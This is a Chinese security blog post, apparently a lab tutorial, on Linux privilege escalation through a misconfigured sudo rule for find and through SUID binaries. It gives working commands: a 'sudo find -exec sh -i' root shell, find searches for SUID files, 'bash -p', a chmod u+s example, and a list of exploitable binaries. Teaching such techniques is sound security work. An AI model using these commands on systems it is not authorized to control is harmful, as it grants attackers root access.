sudo配置错误提权与suid提权

admin 2021年12月22日01:00:03安全文章评论80 views940字阅读3分8秒阅读模式

sudo配置错误提权

为了方便普通用户,管理员可能会允许用户通过sudo运行一部分命令,这种情况很有可能会引入漏洞导致权限提升。比较典型的案例有将sudo权限分配给find命令,以便于普通用户能够查询相关文件。由于find命令包含执行命令的参数,因此可导致攻击者使用普通用户通过sudo执行find命令来获取root特权。

实验

前提:当前普通用户能够通过sudo执行find命令
sudo配置错误提权与suid提权

第一步:查看当前普通用户能够通过sudo执行哪些命令
通过执行sudo –l可以看到anan这个用户是具有find命令的执行权限的
sudo配置错误提权与suid提权
第二步:通过sudo执行find命令获取root权限
sudo find /home -exec sh -i ;
sudo配置错误提权与suid提权
注解:find命令的-exec参数用于跟command命令

Suid提权

Suid简介

1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.
2.命令执行者要对该程序文件拥有执行(x)权限.
3.命令执行者在执行该程序时获得该程序文件属主的身份.
4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效

示例

x被替代表示suid位
命令:chmod u+s /usr/bin/find
sudo配置错误提权与suid提权

常见的可用来提权的Linux可执行文件有:

Namp、vim、find、bash、more、less、nano、cp

查看可以suid提权的可执行文件的命令

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
find / -user root -perm -4000 -print 2>/dev/null

利用bash进行suid提权

执行find / -perm -u=s -type f 2>/dev/null,查看可以suid提前的可执行文件
sudo配置错误提权与suid提权
执行bash –p进行提权
sudo配置错误提权与suid提权

利用find进行suid提权


执行find / -perm -u=s -type f 2>/dev/null,查看可以suid提前的可执行文件


sudo配置错误提权与suid提权
使用find /home/test –exec whoami ;命令提权执行whoami命令
sudo配置错误提权与suid提权

最后

😊😊😊老铁们,在看、点赞、转发点起来!

本文始发于微信公众号(小白学IT):sudo配置错误提权与suid提权

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月22日01:00:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  sudo配置错误提权与suid提权 https://cn-sec.com/archives/453510.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: